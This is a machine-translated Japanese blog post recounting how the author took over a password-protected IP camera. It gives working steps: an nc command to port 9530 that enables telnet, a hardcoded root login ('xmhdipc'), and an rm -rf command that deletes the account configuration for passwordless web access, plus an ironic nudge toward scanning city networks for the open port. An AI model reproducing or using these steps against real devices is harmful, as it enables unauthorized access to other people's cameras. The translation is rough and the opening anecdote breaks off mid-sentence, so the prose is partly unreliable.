おとぎ話
ある紳士の信頼できる鋳鉄製のドアにドゥリアードの組み合わせ用のロックが付いたものを購入しましたが、取り付け後にヒンジがきしみ始めました。 彼は専門家を呼んで、台所に座ってお茶を飲み、飲み物を飲み、インストーラーが突然彼のもとに来て、「
ナンセンス、あなたは思う、それはおとぎ話でのみ起こり、あなたは根本的に間違っているでしょう
この投稿では、そのような開発者が存在することを説得力を持って、そして実例を用いて証明します。
どういうわけか、私は製造設備のユニークな品質で有名な国からIPカメラを入手しました。未知のパスワードで、グーグルは設定をリセットすることでこのパスワードをリセットするユーティリティに至りましたが、それに興味を持っています。
それが最初にカメラで発見されたものです。
ホストが稼働しています(0.0014秒の遅延)。
表示されていません:65529閉じたポート
ポートステートサービス
80 / TCPオープンHTTP
554 / tcp open rtsp
8899 / TCPオープンospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
WEBはパスワードで保護されています。 CLI番号
tcpdumpを起動し、パスワードリセットユーティリティを起動します。
コマンド\ rOpenTelnet:OpenOnceがポート9530 tcpに送信されることがわかります。 その後、デバイスでtelnetが開かれ、プログラムはポート23に移動し、事前定義されたパスワードを使用して、パスワードに関する構成をリセットします。
手動ですべてを試してみましょう
1.カメラでtelnetを開きます
nc 192.168.1.10 9530
\ rOpenTelnet:OpenOnce
開いていることを確認してください
nmap -p 1-65535 192.168.1.10
ポートステートサービス
23 / TCPオープンtelnet
80 / TCPオープンHTTP
554 / tcp open rtsp
8899 / TCPオープンospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
標準のパスワードの下に行きます
telnet 192.168.1.10
192.168.1.10を試す...
192.168.1.10に接続しました
エスケープ文字は「^]」です。
LocalHostログイン:root
パスワード:xmhdipc
Monitor Techへようこそ。
#rm -rf / mnt / mtd / Config / Account *
#再起動
#外部ホストによって接続が閉じられました。
再起動後、パスワードなしでウェブ経由でカメラにアクセスできます。 楽しんでください。
機器メーカーがそのような穴から出るときの指針は、個人的には明確ではありません。
読者の皆様、開いているポート9530で観察したい都市のネットワークを決してスキャンせず、上記のアクションを実行しないでください。これは、休暇や旅行に行きたいという欲求につながる可能性があります。